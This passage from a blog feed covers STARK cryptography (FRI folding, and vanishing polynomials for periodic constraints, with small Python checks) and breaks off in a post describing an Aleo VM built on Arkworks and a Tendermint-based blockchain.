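def next_layer(pz, pminus, z, alpha, p):
    """Compute u_{k+1} from P_k(z), P_k(-z), the point z and challenge alpha."""
    g = (pz + pminus) * pow(2, -1, p) % p
    hh = (pz - pminus) * pow(2 * z % p, -1, p) % p
    return (g + alpha * hh) % p

# First layer: P_0(13) = 4, P_0(-13) = P_0(4) = 13, challenge beta_0 = 3
u1 = next_layer(4, 13, 13, 3, p)
assert u1 == 14          # matches P_1(16), as computed above

# Second layer: P_1(16) = 14, P_1(-16) = P_1(1) = 5, challenge beta_1 = 2
u2 = next_layer(14, 5, 16, 2, p)
assert u2 == 9           # matches P_2(4)
```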
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;STARKs are powerful cryptographic primitives allowing a party to prove the integrity of a computation. To generate the proof, we obtain the execution trace of the program and interpret each column of the trace as the evaluations of a polynomial over a “nice” domain. The rows of the execution trace are related by low-degree polynomials, which determine the constraints. When we compose the constraint polynomials with the trace polynomials, we enforce the constraints over the execution trace. We can then divide them by the vanishing polynomial over their validity domain (the places where each constraint is enforced); if the constraints hold, the division is exact and yields a polynomial. Instead of proving that the result is a polynomial, STARKs show that the result is close to a low-degree polynomial. FRI randomly folds the function, halving the degree at each step; the critical point is that this folding preserves distance from low-degree polynomials. The protocol contains two phases: commit, in which the prover binds himself to evaluations of the polynomials over their corresponding domain, and decommit, where he generates the proof that allows the verifier to check the calculations. In an upcoming post, we will cover some optimizations and examples.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Everything you wanted to know about periodic constraints in STARKs but nobody told you</title>
          <pubDate>Fri, 24 Feb 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/periodic-constraints-and-recursion-in-zk-starks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/periodic-constraints-and-recursion-in-zk-starks/</guid>
<description xml:base="https:&#x2F;&#x2F;lambdaclass.github.io&#x2F;lambdaclass_blog&#x2F;posts&#x2F;periodic-constraints-and-recursion-in-zk-starks&#x2F;">&lt;p&gt;As you might have already guessed, we are studying all the literature and code available to become one of the big players in the industry. We want to thank &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;EliBenSasson&quot;&gt;Eli Ben-Sasson&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;StarkWareLtd&quot;&gt;Starkware&lt;&#x2F;a&gt; for the amazing work they’ve been doing in the space and for helping us to learn all this. We also want to thank &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;maxgillett&quot;&gt;Max Gillett&lt;&#x2F;a&gt; for the time he has invested in talking with us about all these things. They have been amazing to us and we hope we can continue learning a lot from them.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Introduction&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;046.pdf&quot;&gt;ZK-STARKs&lt;&#x2F;a&gt; (zero-knowledge scalable, transparent, post-quantum arguments of knowledge) are cryptographic tools that allow one party to prove the integrity of a computation. For example, a party can show that he computed the first 1000 elements of a Fibonacci sequence correctly, ran a given machine learning algorithm, or correctly processed 5000 Ethereum transactions. Moreover, checking the resulting proof is much faster than performing the naïve re-execution of the computation by a verifier (the verification time scales logarithmically in the calculation size). Given their properties, they have attracted interest in many areas; among them, they can solve the scalability problems that decentralized ledgers suffer from.&lt;&#x2F;p&gt;
&lt;p&gt;There are many interesting resources to learn the basics of STARKs, such as Starkware’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;starkware.co&#x2F;stark-101&#x2F;&quot;&gt;STARK 101&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;aszepieniec.github.io&#x2F;stark-anatomy&#x2F;overview&quot;&gt;Anatomy of a STARK&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;andrewmilson&#x2F;ministark&quot;&gt;Ministark&lt;&#x2F;a&gt;, as well as Starkware’s blog on arithmetization (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;arithmetization-i-15c046390862&quot;&gt;parts I&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;arithmetization-ii-403c3b3f4355&quot;&gt;II&lt;&#x2F;a&gt;). In this post, we will focus on how constraints are enforced and how to deal with them when applied periodically. Soon we will be posting a more in-depth version of STARKs.&lt;&#x2F;p&gt;
&lt;p&gt;The starting point for STARKs is arithmetization. We generate the execution trace of the program, obtaining a table showing how each register evolves according to the instructions being executed. The values of the execution table are related by constraints (usually low-degree polynomials). We will focus, in particular, on transition constraints and how to check that the values of the trace satisfy them.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Transition constraints&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;A transition constraint dictates the relations between different states of a computation. Suppose we have one register, which contains the elements of a Fibonacci sequence,&lt;&#x2F;p&gt;
&lt;p&gt;$a_0=a_1=1$&lt;&#x2F;p&gt;
&lt;p&gt;$a_{n+2}=a_{n+1}+a_n$&lt;&#x2F;p&gt;
&lt;p&gt;The last equation gives the transition constraint for the Fibonacci sequence; the first two give the boundary constraints for the problem, which are easier to deal with. To make our discussion easier, suppose that we performed $2^m$ steps of the Fibonacci sequence for some $m \geq 1$. We get, by rewriting the constraints and analyzing each index,&lt;&#x2F;p&gt;
&lt;p&gt;$a_2-a_1-a_0=0$&lt;&#x2F;p&gt;
&lt;p&gt;$a_3-a_2-a_1=0$&lt;&#x2F;p&gt;
&lt;p&gt;$a_4-a_3-a_2=0$&lt;&#x2F;p&gt;
&lt;p&gt;and so on. We can convert the trace elements into polynomials by interpolating over a suitable domain. To make things easier, we choose the $n$-th roots of unity, which enables us to perform interpolation via the fast Fourier transform. The roots are spanned by one element (a generator, $g$): by taking its powers, we get all the $n$-th roots of unity, $\left\{1,g,g^2,g^3,…,g^{n-1}\right\}$. Let us call $t(x)$ the polynomial interpolating the trace, that is, the polynomial taking the following values:&lt;&#x2F;p&gt;
&lt;p&gt;$t(1)=a_0$&lt;&#x2F;p&gt;
&lt;p&gt;$t(g)=a_1$&lt;&#x2F;p&gt;
&lt;p&gt;$t(g^2)=a_2$&lt;&#x2F;p&gt;
&lt;p&gt;$\vdots$&lt;&#x2F;p&gt;
&lt;p&gt;$t(g^{n-1})=a_{n-1}$&lt;&#x2F;p&gt;
&lt;p&gt;We can express the constraints as&lt;&#x2F;p&gt;
&lt;p&gt;$t(g^2)-t(g)-t(1)=0$&lt;&#x2F;p&gt;
&lt;p&gt;$t(g^3)-t(g^2)-t(g)=0$&lt;&#x2F;p&gt;
&lt;p&gt;$t(g^4)-t(g^3)-t(g^2)=0$&lt;&#x2F;p&gt;
&lt;p&gt;In a generic way,&lt;&#x2F;p&gt;
&lt;p&gt;$t(g^2x)-t(gx)-t(x)=0$&lt;&#x2F;p&gt;
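&lt;p&gt;The transition constraint can be checked concretely with a short Python sketch. The parameters here are ours, not the post’s: arithmetic modulo $17$, where $g=2$ generates the $8$-th roots of unity, and a Fibonacci trace of length $n=8$:&lt;&#x2F;p&gt;

```python
# Toy check that t(g^2 x) - t(g x) - t(x) = 0 on the trace domain.
# Parameters are illustrative: arithmetic modulo 17, n = 8, g = 2 (order 8 mod 17).
P, n, g = 17, 8, 2

# Fibonacci trace of length n, reduced modulo P
trace = [1, 1]
for _ in range(n - 2):
    trace.append((trace[-1] + trace[-2]) % P)

# t interpolates the trace on {1, g, ..., g^(n-1)}, so t(g^k) = trace[k];
# on the domain we can therefore evaluate t by simple lookup.
domain = [pow(g, k, P) for k in range(n)]
t = dict(zip(domain, trace))

# the constraint must hold for x in {1, g, ..., g^(n-3)}
for k in range(n - 2):
    x = domain[k]
    assert (t[g * g * x % P] - t[g * x % P] - t[x]) % P == 0
```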
&lt;p&gt;The way we can check that the constraints are enforced is by verifying that the polynomial $p(x)=t(g^2x)-t(gx)-t(x)$ is divisible by $(x-x_0)$, where $x_0$ is the point where we enforce the constraint. Another way to see this is that the resulting function&lt;&#x2F;p&gt;
&lt;p&gt;$$Q(x)=\frac{p(x)}{x-x_0} $$&lt;&#x2F;p&gt;
&lt;p&gt;is a polynomial. Instead of showing that $Q(x)$ is a polynomial, the STARK IOP proves that it is close to a low-degree polynomial.&lt;&#x2F;p&gt;
&lt;p&gt;In the case of the Fibonacci sequence, the constraint is valid for $x_0 \in \left\{1,g,g^2,…,g^{n-3} \right\}$. Given that $p(x)$ is divisible by each factor, it is divisible by the product of all of them,&lt;&#x2F;p&gt;
&lt;p&gt;$Z_D(x)=\prod_{k=0}^{n-3} (x-g^k)$&lt;&#x2F;p&gt;
&lt;p&gt;The problem we face with this polynomial is that, to compute it, we need to perform a linear number of multiplications, that is, as many multiplications as there are factors. Fortunately, the roots of unity have the following property:&lt;&#x2F;p&gt;
&lt;p&gt;$s(x)=\prod_{k=0}^{n-1} (x-g^k)=x^n-1$&lt;&#x2F;p&gt;
&lt;p&gt;So, instead of performing a linear amount of operations, we can calculate $Z_D(x)$ from $s(x)$ by taking out the missing factors:&lt;&#x2F;p&gt;
&lt;p&gt;$$Z_D(x)=\frac{ s(x)}{\prod_j (x-g^j)}=\frac{x^n-1}{(x-g^{n-1})(x-g^{n-2})} $$&lt;&#x2F;p&gt;
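&lt;p&gt;Both the identity $\prod_k (x-g^k)=x^n-1$ and the quotient form of $Z_D(x)$ can be verified numerically. The following Python sketch uses toy parameters of our choosing (arithmetic modulo $17$, $n=8$, $g=2$):&lt;&#x2F;p&gt;

```python
# Numeric check (modulo 17, n = 8, g = 2) that the product of (x - g^k) over
# all n-th roots of unity equals x^n - 1, and that Z_D(x) can be evaluated
# as (x^n - 1) / ((x - g^(n-1))(x - g^(n-2))) instead of an (n-2)-factor product.
P, n, g = 17, 8, 2
domain = [pow(g, k, P) for k in range(n)]

def prod_eval(x, points):
    out = 1
    for r in points:
        out = out * (x - r) % P
    return out

# s(x) = prod_k (x - g^k) = x^n - 1 holds at every field element
for x in range(P):
    assert prod_eval(x, domain) == (pow(x, n, P) - 1) % P

# Z_D evaluated both ways at a sample point x = 3 (not in the domain)
x = 3
direct = prod_eval(x, domain[: n - 2])
denom = (x - domain[n - 1]) * (x - domain[n - 2]) % P
shortcut = (pow(x, n, P) - 1) * pow(denom, P - 2, P) % P
assert direct == shortcut
```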
&lt;p&gt;The advantage of STARKs is that if a constraint is repeated many times, we can express that concisely. The only change is in the vanishing polynomial $Z_D(x)$, which gains extra factors.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Constraints repeating after $m$ steps&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In a case such as Fibonacci’s, the constraint involves almost all points in the domain, so calculating the vanishing polynomial, $Z_D(x)$, is straightforward. But what happens when a constraint is applied only at certain points? For example, in EthStark, some transition constraints are applied only after $m$ steps.&lt;&#x2F;p&gt;
&lt;p&gt;To fix ideas, suppose that we have a transition constraint of the form&lt;&#x2F;p&gt;
&lt;p&gt;$f(x,gx,…,g^d x)=0$&lt;&#x2F;p&gt;
&lt;p&gt;Our Fibonacci sequence fits this form. We will now consider that it applies every four steps; that is, the constraint is enforced at $x_0 \in \left\{1, g^4, g^8, g^{12},…\right\}$.&lt;&#x2F;p&gt;
&lt;p&gt;The vanishing polynomial looks like&lt;&#x2F;p&gt;
&lt;p&gt;$Z_D(x)=\prod_k (x-g^{4k})$&lt;&#x2F;p&gt;
&lt;p&gt;If $g$ is a generator of the $n$-th roots of unity, $g^4$ is a generator of the $n&#x2F;4$-th roots of unity, $\omega=g^4$. So, we can rewrite the former as&lt;&#x2F;p&gt;
&lt;p&gt;$Z_D(x)=\prod_k (x-\omega^k)$&lt;&#x2F;p&gt;
&lt;p&gt;But since the product is over all $n&#x2F;4$-th roots of unity, $Z_D(x)=x^{n&#x2F;4}-1$. If the constraint is applied every 32 steps, as in EthStark, the vanishing polynomial is simply $Z_D(x)=x^{n&#x2F;32}-1$. If we skip some steps, we need to take those out. For example, suppose we have two constraints&lt;&#x2F;p&gt;
&lt;p&gt;$f_1(x,g x)=0$&lt;&#x2F;p&gt;
&lt;p&gt;$f_2(x, g x)=0$.&lt;&#x2F;p&gt;
&lt;p&gt;Constraint 2 is enforced every four steps, and constraint 1 is enforced every two (but not where constraint 2 is valid). To make it clear, constraint 2 is valid at $x_0 \in \left\{1,g^4,g^8,g^{12},…\right\}$ and constraint 1 is valid at $\left\{g^2, g^6, g^{10},… \right\}$. The vanishing polynomial for constraint 2 is&lt;&#x2F;p&gt;
&lt;p&gt;$Z_{D,2}(x)=\prod (x-g^{4k})$&lt;&#x2F;p&gt;
&lt;p&gt;and we have already found the solution, $Z_{D,2}(x)=(x^{n&#x2F;4}-1)$. For constraint 1, we have&lt;&#x2F;p&gt;
&lt;p&gt;$Z_{D,1}(x) =\prod_{i \not\equiv 0 \pmod{2} } (x-g^{2i})$&lt;&#x2F;p&gt;
&lt;p&gt;The condition $i \not\equiv 0 \pmod{2}$ is just a way of saying that the product only considers odd values of $i$ (so multiples of 4 are ruled out). We can apply the same trick as before:&lt;&#x2F;p&gt;
&lt;p&gt;$$Z_{D,1}=\frac{ \prod (x-g^{2i})}{\prod (x-g^{4k})}$$&lt;&#x2F;p&gt;
&lt;p&gt;This may seem weird, but we know precisely how to calculate each of them:&lt;&#x2F;p&gt;
&lt;p&gt;$$Z_{D,1}(x)=\frac{x^{n&#x2F;2}-1}{x^{n&#x2F;4}-1} $$&lt;&#x2F;p&gt;
&lt;p&gt;From here, we can remove some points where the constraint is not enforced. For example, if it is not valid at $x_0=g^6$,&lt;&#x2F;p&gt;
&lt;p&gt;$$Z_{D,1}(x)=\frac{x^{n&#x2F;2}-1}{(x^{n&#x2F;4}-1)(x-g^6)} $$&lt;&#x2F;p&gt;
&lt;p&gt;If we added a constraint $f_3(x,gx)$ that is enforced on steps $\left\{32,64,96,… \right\}$, we would have three vanishing polynomials,&lt;&#x2F;p&gt;
&lt;p&gt;$$Z_{D,3}=\frac{x^{n&#x2F;32}-1}{x-1} $$&lt;&#x2F;p&gt;
&lt;p&gt;$$Z_{D,2}=\frac{(x^{n&#x2F;4}-1)(x-1)}{x^{n&#x2F;32}-1} $$&lt;&#x2F;p&gt;
&lt;p&gt;$$Z_{D,1}(x)=\frac{x^{n&#x2F;2}-1}{x^{n&#x2F;4}-1} $$&lt;&#x2F;p&gt;
&lt;p&gt;So, by taking advantage of the properties of the roots of unity, we can enforce constraints that are applied periodically.&lt;&#x2F;p&gt;
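&lt;p&gt;As a sanity check of the periodic case, this Python sketch compares $Z_{D,1}(x)=(x^{n&#x2F;2}-1)&#x2F;(x^{n&#x2F;4}-1)$ against the direct product over the points $g^{2i}$ with $i$ odd (toy parameters of our choosing: arithmetic modulo $17$, $n=16$, $g=3$):&lt;&#x2F;p&gt;

```python
# Sanity check of Z_{D,1}(x) = (x^(n/2) - 1) / (x^(n/4) - 1) against the
# direct product over g^(2i) with i odd. Parameters are illustrative:
# arithmetic modulo 17, n = 16, g = 3 (3 has order 16 mod 17).
P, n, g = 17, 16, 3
odd_points = [pow(g, 2 * i, P) for i in (1, 3, 5, 7)]

def z1_direct(x):
    out = 1
    for r in odd_points:
        out = out * (x - r) % P
    return out

def z1_shortcut(x):
    num = (pow(x, n // 2, P) - 1) % P
    den = (pow(x, n // 4, P) - 1) % P
    return num * pow(den, P - 2, P) % P

# the two agree wherever the denominator does not vanish
for x in range(P):
    if (pow(x, n // 4, P) - 1) % P != 0:
        assert z1_direct(x) == z1_shortcut(x)
```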
&lt;p&gt;&lt;strong&gt;Summary&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;STARKs are a powerful tool that allows us to prove the integrity of a computation. To that end, STARKs start with the execution trace of a program and interpolate each column using polynomials. To see that the trace is valid, we need to check that all the constraints given by the computation are enforced. These constraints can be composed with the trace polynomials; if the constraints hold at step $T$, the resulting polynomial $P(x)$ should be divisible by $(x-g^{T-1})$ or, equivalently, there is a polynomial $Q(x)$ such that $P(x)=Q(x)(x-g^{T-1})$. If a constraint is applied multiple times, we can use the following facts to express them concisely:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The polynomial $P(x)$ is divisible by the product of factors of the form $x-x_0$.&lt;&#x2F;li&gt;
&lt;li&gt;We can easily shift the constraints thanks to the structure of the multiplicative subgroups.&lt;&#x2F;li&gt;
&lt;li&gt;The product of the factors $x-h$ over all elements $h$ of a multiplicative subgroup yields $x^n-1$, where $n$ is the subgroup’s order (number of elements).&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;This results in advantages in terms of performance and ease of understanding.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, we will post a beginner’s version of STARKs soon, so stay tuned!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>A walkthrough on the open source Aleo VM implemented with Arkworks and blockchain implemented with Tendermint</title>
          <pubDate>Fri, 03 Feb 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/open-source-aleo-vm-implemented-with-arkworks-and-blockchain-implemented-with-tendermint/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/open-source-aleo-vm-implemented-with-arkworks-and-blockchain-implemented-with-tendermint/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/open-source-aleo-vm-implemented-with-arkworks-and-blockchain-implemented-with-tendermint/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;For the last 12 weeks, at LambdaClass, we have been developing an alternative implementation of the Aleo Blockchain. We want to thank Alex Pruden and Howard Wu from Aleo for their support throughout the process.&lt;&#x2F;p&gt;
&lt;p&gt;At a high level, the project consists of a Consensus Layer using Tendermint and a Zero-Knowledge Virtual Machine targeting Aleo instructions implemented with the arkworks framework.&lt;&#x2F;p&gt;
&lt;p&gt;You can check out the code:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;aleo_lambda_blockchain&quot;&gt;Tendermint Blockchain implementation&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;aleo_lambda_vm&quot;&gt;Virtual Machine implemented with Arkworks&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The key features of this blockchain revolve around the fact that it is designed to be a fully-private platform for users to develop applications that can then be built and executed off-chain, generating a proof of execution which is then sent to the blockchain nodes for verification and storage.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;If you’re in need of a team of engineers and researchers who’ve been working together for a decade in areas like distributed systems, machine learning, compilers, and cryptography, we’re your guys. Wanna chat more about it? Book a meeting with us by sending us an &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;calendly.com&#x2F;federicocarrone&quot;&gt;email&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;consensus-layer&quot;&gt;Consensus Layer&lt;&#x2F;h2&gt;
&lt;p&gt;The consensus layer is in charge of validating incoming transactions which perform state changes and replicating these transactions (and the order in which they were performed) on an arbitrary number of nodes.&lt;&#x2F;p&gt;
&lt;p&gt;To achieve this, we decided to utilize &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tendermint&#x2F;tendermint&quot;&gt;Tendermint Core&lt;&#x2F;a&gt;, an implementation of a consensus mechanism written in Go. Alongside the Tendermint Core binaries, you need to run your implementation of an &lt;em&gt;Application Blockchain Interface&lt;&#x2F;em&gt; (or &lt;em&gt;ABCI&lt;&#x2F;em&gt; for short). This ABCI needs to implement specific hooks that Tendermint Core calls through a socket whenever required. For example, when receiving a transaction, it will call &lt;code&gt;CheckTx&lt;&#x2F;code&gt;, which is supposed to validate the transaction before entering it into the mempool and relaying it to other nodes. This flexible approach allows for the ABCI to be written in any language as long as it responds to the calls appropriately. We decided to write our implementation in Rust.&lt;&#x2F;p&gt;
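&lt;p&gt;To give a feel for the hook-based design, here is a hypothetical Python model of a &lt;code&gt;CheckTx&lt;&#x2F;code&gt;-style validation step. The fields and checks are invented for illustration; this is neither the real Tendermint ABCI API nor our Rust implementation:&lt;&#x2F;p&gt;

```python
# Hypothetical model of a CheckTx-style hook: validate a transaction before
# it enters the mempool. Fields and checks are invented for illustration.
def check_tx(tx, program_store):
    # an execution transaction must reference a deployed program...
    if tx.get("program") not in program_store:
        return {"code": 1, "log": "unknown program"}
    # ...and carry a proof of correct execution for the node to verify
    if "proof" not in tx:
        return {"code": 1, "log": "missing proof"}
    return {"code": 0, "log": "ok"}

deployed = {"credits", "foo.aleo"}
assert check_tx({"program": "foo.aleo", "proof": "stub"}, deployed)["code"] == 0
assert check_tx({"program": "bar.aleo", "proof": "stub"}, deployed)["code"] == 1
```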
&lt;p&gt;You can see the code for this implementation &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;AleoHQ&#x2F;aleo_lambda_blockchain&quot;&gt;here&lt;&#x2F;a&gt;. The repository also contains a CLI application to compile, deploy and execute programs and send these transactions to the blockchain easily. It also has several other features related to accounts, such as retrieving a user’s balance or seeing which &lt;em&gt;records&lt;&#x2F;em&gt; the account possesses. We will explain the motivation behind records in the integration section of this post, but they are essentially a way to encapsulate state and ownership functionality in the blockchain.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;design-considerations&quot;&gt;Design considerations&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;architecture.png?raw=true&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Considering the VM implementation and the requirements from the blockchain, we had to make several design decisions on the consensus layer. Here’s a general overview of how Tendermint Core was implemented:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Tendermint Core and the ABCI run side by side on the same node and are coupled by the interface defined by the protocol’s hooks.&lt;&#x2F;li&gt;
&lt;li&gt;All code executed on the ABCI needs to be deterministic and isolated from external services, since we want to ensure all transactions perform deterministic state changes on every node in the network.&lt;&#x2F;li&gt;
&lt;li&gt;The ABCI implements two databases to maintain the current state of the blockchain: the program store and the record store.
&lt;ul&gt;
&lt;li&gt;The program store keeps track of every deployed program’s verifying keys and their uses. The store contains the &lt;code&gt;credits&lt;&#x2F;code&gt; program’s keys as a built-in default; this program defines credit records and is essentially a native Aleo program with functions for managing them.&lt;&#x2F;li&gt;
&lt;li&gt;The record store encapsulates the functionality for validating whether the records used in incoming transactions have already been spent.
&lt;ul&gt;
&lt;li&gt;The privacy requirements imply that we cannot disclose which records have been spent and which have not. Because of this, every record in the blockchain (i.e., one output by the execution of a program) is stored separately from the spent records, of which we only store serial numbers.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;The genesis block needs to be provided to Tendermint on startup through a JSON file. We have written a dedicated binary to generate it for any number of nodes and give each of them a fixed amount of starting credits.&lt;&#x2F;li&gt;
&lt;li&gt;To make testing simple, we have created several &lt;code&gt;make&lt;&#x2F;code&gt; targets to initialize and start multiple validators that can run locally or on a remote network.&lt;&#x2F;li&gt;
&lt;li&gt;Both the CLI and the consensus layer support Aleo’s SnarkVM and our own LambdaVM, which are currently interchangeable through a compiler flag.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;staking&quot;&gt;Staking&lt;&#x2F;h3&gt;
&lt;p&gt;Tendermint supports adding new nodes to the network. In general, nodes in the network can work in two different modes:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Non-validator: the node catches up with the blockchain by performing every transaction but does not have voting power to validate and commit blocks.&lt;&#x2F;li&gt;
&lt;li&gt;Validator: the node is part of the network and can vote on and sign blocks.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;To add a non-validator, the node needs to have the same Genesis block and point to persistent peers (IP addresses acting as fixed nodes in the network). To transform a node into a validator, the ABCI needs to implement functionality to update the voting power of a Tendermint node.&lt;&#x2F;p&gt;
&lt;p&gt;For this, we implemented a &lt;code&gt;stake&lt;&#x2F;code&gt; command to “freeze” credits by exchanging them for staking records (and increase the voting power of a validator), which you can, in turn, &lt;code&gt;unstake&lt;&#x2F;code&gt; whenever you desire (decreasing the voting power accordingly).&lt;&#x2F;p&gt;
&lt;p&gt;When a node is a validator, it receives a reward for each block commit it participates in.&lt;&#x2F;p&gt;
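&lt;p&gt;The stake&#x2F;unstake bookkeeping described above can be modeled in a few lines (a hypothetical sketch of the flow, not the actual implementation):&lt;&#x2F;p&gt;

```python
# Hypothetical model of the stake/unstake flow: staking freezes credits into
# a staked balance and raises voting power; unstaking reverses it.
class Validator:
    def __init__(self, credits):
        self.credits = credits
        self.staked = 0

    def voting_power(self):
        return self.staked

    def stake(self, amount):
        if amount > self.credits:
            raise ValueError("not enough credits to stake")
        self.credits -= amount
        self.staked += amount

    def unstake(self, amount):
        if amount > self.staked:
            raise ValueError("not enough staked credits")
        self.staked -= amount
        self.credits += amount

v = Validator(100)
v.stake(40)
assert (v.credits, v.voting_power()) == (60, 40)
v.unstake(10)
assert (v.credits, v.voting_power()) == (70, 30)
```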
&lt;h2 id=&quot;virtual-machine&quot;&gt;Virtual Machine&lt;&#x2F;h2&gt;
&lt;p&gt;At a high level, our VM provides an API to take an Aleo program that looks like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;program main.aleo;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;function add:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    input r0 as u16.public;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    input r1 as u16.private;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    add r0 r1 into r2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    output r2 as u16.public;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;And generate a pair of proving and verifying keys for it (this is usually called &lt;em&gt;building&lt;&#x2F;em&gt; or &lt;em&gt;synthesizing&lt;&#x2F;em&gt; the program), allowing anyone to execute the program and provide proof of it or verify said proof. The consensus layer uses this to deploy programs (i.e., upload their verifying key along with the code), execute them, and verify them.&lt;&#x2F;p&gt;
&lt;p&gt;Internally, this VM uses &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&quot;&gt;Arkworks&lt;&#x2F;a&gt; as a backend. Programs are turned into a Rank One Constraint System (&lt;code&gt;R1CS&lt;&#x2F;code&gt;), which is then passed on to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&#x2F;marlin&quot;&gt;Marlin&lt;&#x2F;a&gt; prover for execution. As we started using Arkworks, we noticed some aspects of the API and its genericity were becoming a burden for developers, so we created a thin wrapper around it called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;simpleworks&quot;&gt;Simpleworks&lt;&#x2F;a&gt;, along with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lambdaclass.github.io&#x2F;simpleworks&#x2F;overview.html&quot;&gt;some basic documentation&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;example&quot;&gt;Example&lt;&#x2F;h3&gt;
&lt;p&gt;Given the following Aleo program&lt;&#x2F;p&gt;
